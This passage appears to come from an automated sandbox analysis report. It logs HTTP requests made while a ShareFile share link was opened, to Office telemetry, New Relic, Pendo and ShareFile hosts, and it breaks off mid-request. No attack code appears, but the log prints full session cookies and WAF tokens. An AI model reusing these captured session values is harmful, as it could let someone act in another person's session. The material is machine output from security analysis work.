AWSALBTGCORS=NVv2g2uOgR2zh2tNJvuiAiYQP2k3O76OzOQ/tEc3XukrP1CfH0Dh6HLs4Gh3V8hyKLfQPA6kfH86FLcPRd1Xvjpj1xkjXUrs5ObKGb6CTmpn8cbbFSX7gDZcpGtVWuQeLbJdaJD8HsEnqzfH7zj4sh7MBgGrk/KmUo6FfX4qS6kz; AWSALBCORS=UPFW6SZTf4U4LpUegqAdD0EAa30Vl4pBooaJrj/fZWfBakn7Mf4SEOHmmy2csjWdwIr0YRuLz8h6hAIuo07o+rvc086TGrkNrSxsaXWUdiNT7cx2g0/mM0tLi12t
            Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=26232&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461c&be=952&fe=25337&dc=6057&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728497103288,%22n%22:0,%22f%22:3,%22dn%22:27,%22dne%22:36,%22c%22:36,%22s%22:37,%22ce%22:732,%22rq%22:732,%22rp%22:857,%22rpe%22:1048,%22dl%22:862,%22di%22:5790,%22ds%22:6056,%22de%22:6057,%22dc%22:25337,%22l%22:25337,%22le%22:25341%7D,%22navigation%22:%7B%7D%7D&fp=1699&fcp=2575&jsonp=NREUM.setToken HTTP/1.1Host: bam.nr-data.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /android-chrome-192x192.png HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=63osobTAQLmx/e79r+8seONME9zS9zd3bSDnE5zHBAXMKa3tBrCykklFhxJ4LPvVKDFsb8XfoAfJFlAiE/sL44yepG7tVOUhKsCjzjFUH5mKNhvqVCZVkBecZ5zKNvMwLvQgPOXU9gVfiShARsTOuFgDyv5F46k7MRa4GTo1GnjK; AWSALBTGCORS=63osobTAQLmx/e79r+8seONME9zS9zd3bSDnE5zHBAXMKa3tBrCykklFhxJ4LPvVKDFsb8XfoAfJFlAiE/sL44yepG7tVOUhKsCjzjFUH5mKNhvqVCZVkBecZ5zKNvMwLvQgPOXU9gVfiShARsTOuFgDyv5F46k7MRa4GTo1GnjK; AWSALB=O0e2wnNcaKkdqJkQ/3RfczXKd8TXUyMD+JDW2B2u4oPKTV40rHzVdUxTleMEPhpBBcwn6Ub48grxeihFvrgEkwdIf2r2+Wp6lEs8W7ZlwR6mPNA+y6X7zZTgKSib; AWSALBCORS=O0e2wnNcaKkdqJkQ/3RfczXKd8TXUyMD+JDW2B2u4oPKTV40rHzVdUxTleMEPhpBBcwn6Ub48grxeihFvrgEkwdIf2r2+Wp6lEs8W7ZlwR6mPNA+y6X7zZTgKSib
            Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=26232&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461c&be=952&fe=25337&dc=6057&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728497103288,%22n%22:0,%22f%22:3,%22dn%22:27,%22dne%22:36,%22c%22:36,%22s%22:37,%22ce%22:732,%22rq%22:732,%22rp%22:857,%22rpe%22:1048,%22dl%22:862,%22di%22:5790,%22ds%22:6056,%22de%22:6057,%22dc%22:25337,%22l%22:25337,%22le%22:25341%7D,%22navigation%22:%7B%7D%7D&fp=1699&fcp=2575&jsonp=NREUM.setToken HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=35f95be610a6cff2
            Source: global trafficHTTP traffic detected: GET /data/guide.json/74b07336-7560-45fc-7cd1-95032a784d52?id=12&jzb=eJyNj01r4zAQhv-LzrFlObZj-VZIWnLpBvoBy1LM2JokYmVJyHLCUvLfM84hSy-lN3v0fjzvJzvpUUcXtoo1rN1tnte_2tf26e_v7ePuXJ5hwxYM-t5NNt4kUGdlVkuRiG4lkroWVSIl1Ila7ctSFX0ny5wsUzAkPsbox4ZzH3DQGLouHY8QcK8Npr0b-O2PnzSeuajlshK5XImqKCrRU4Yz6v0_nJ2MWbABIyiIwJo7-fypv6E3YA8THJAUaNu3F3a5L5qt4P3aDaAtvX-hI-st9oeL9whxCjiy5g9zy6qkE9o-_PMRFVK-YR9U7KnAxod7PZ1ozsyWSS4ynmd5Qc4ThlG7GSlP80KmovXBKXa5XAHfzYXn&v=2.249.1_prod&ct=1728497131244 HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /data/guide.gif/74b07336-7560-45fc-7cd1-95032a784d52?jzb=eJwFwIEIAAAAwDDQd3-N1QABFQC5&ct=1728497131246&v=2.249.1_prod HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=NVv2g2uOgR2zh2tNJvuiAiYQP2k3O76OzOQ/tEc3XukrP1CfH0Dh6HLs4Gh3V8hyKLfQPA6kfH86FLcPRd1Xvjpj1xkjXUrs5ObKGb6CTmpn8cbbFSX7gDZcpGtVWuQeLbJdaJD8HsEnqzfH7zj4sh7MBgGrk/KmUo6FfX4qS6kz; AWSALB=UPFW6SZTf4U4LpUegqAdD0EAa30Vl4pBooaJrj/fZWfBakn7Mf4SEOHmmy2csjWdwIr0YRuLz8h6hAIuo07o+rvc086TGrkNrSxsaXWUdiNT7cx2g0/mM0tLi12t; AWSALBTGCORS=H4hfAYWzIqUBBGF3t26jCxlW1sDjVhL1pyTRvSkDXqeT3NNQOthtrf3Wl5uDNA+vHFBjhjDuoqMyQxaeJyjet5hkNLRmA2uieTEAuM2zhLqooZfs/JRWjh3UWrDj59bLBrINd+wTdWxZDeVRyhu5Mp/yQi5Ev/IAwWrx5bOHG4LV; AWSALBCORS=f5WF951OOcl+RCsmqKB1CB75PPfbfCYBXVJnElyjY6BYCKH7RS2U10fzaahYwx6LngQgNy2j8Bb8koyQ3h3pW6Dq6gr1n094Zy1zWsnMiTYm0pyGLAypWOn4qcih
            Source: global trafficHTTP traffic detected: GET /bundles/3aa33bb6fffd83a61c47.svg HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALBTGCORS=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALB=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj; AWSALBCORS=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj
            Source: global trafficHTTP traffic detected: GET /bundles/b79627b64df3ab63890d.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALBTGCORS=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALB=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj; AWSALBCORS=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj
            Source: global trafficHTTP traffic detected: GET /bundles/1c992ae0c14e95098d9a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALBTGCORS=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALB=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj; AWSALBCORS=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj
            Source: global trafficHTTP traffic detected: GET /bundles/b69d9728d2dbe0747c8a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALBTGCORS=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALB=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj; AWSALBCORS=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj
            Source: global trafficHTTP traffic detected: GET /bundles/4229061ac836f0f16eea.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALBTGCORS=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALB=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj; AWSALBCORS=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj
            Source: global trafficHTTP traffic detected: GET /bundles/5be3ba1b444ac539eaf5.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALBTGCORS=PY+YY8QDtPZG3JimTU0VI8tCtd9BwsUYzI76Cu+DpMI7xJALZH1ZqaArpbdFY0JsQZat4LObDFreiahZqi1y39+D0q6wS9TVhIxiej6zhdSJuWTsnqqVZJaGZHwcUPXvD4JIHjbpK44D/B5YT29sDeaoKTuHBsXuHFpUNQbC64yo; AWSALB=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj; AWSALBCORS=Re5U1b8OoVRofoKUQaDlEZgb+oPChFvvGAuUUF3wIBEJoLOHJbzzai/zMxgb+d1XBrsGGijtX69AWWSPncz5fX5oIdquMfSnD5KncZ+LpxEkzJdHftDKsfpyLjTj
            Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /data/guide.gif/74b07336-7560-45fc-7cd1-95032a784d52?jzb=eJwFwIEIAAAAwDDQd3-N1QABFQC5&ct=1728497131246&v=2.249.1_prod HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /data/ptm.gif/74b07336-7560-45fc-7cd1-95032a784d52?v=2.249.1_prod&ct=1728497131241&jzb=eJzVkt9vmzAQx_8XPyeADQact2ntpkj7wZROWlVVyMCRWANMjUnEqvzvPacRal-iTdo0lSfs89197r7fu0dipx7IiqgKOqvqiSxIYfRhAJNb1WKEJiyNREJDyli8IHs1KKtNripMyrPrL1df85v848_b9YfswA_yGgvIstRjZ5_fyDTgQSrokhYJXaYpjZdCyHRZJTXnVVQWgjPMGU2Dj3fW9sPK93sDrQJTFN6wkwZq1YBX6tY_nfy9goNPUxHGlCFZHEUxLbFGb3Q_kNUj0U2V_w6oe_cSthub5l-NeEQ-hO_sjSzWcy_7fCD8FtdrN4yG7zMZCYUtaiNbOAX3ZZFNn6ZJbzcZl3u3rgEeRuhK1CdAwSYLOHfE2XExC9qClRfFFG9EzDOk-73E2chuO8qtGx26_PvGLfzM7lJl31_pVqoO468wMPVPRqtB2tG4dd8RHcYcr1AHM_UWKsD6DbmflX43t8erSlrHFgifBj4LWISZezCD0g6JeSwSHs1x6uqvW2VwTU7hH2sRF5DVv7bfNrvPWfrKSXR2Ek_CF05qtKwuOSlEC74JJ7lBzviMh2Hk0WD-4v-0dDYvPYyD4_0TChW3Tg HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: 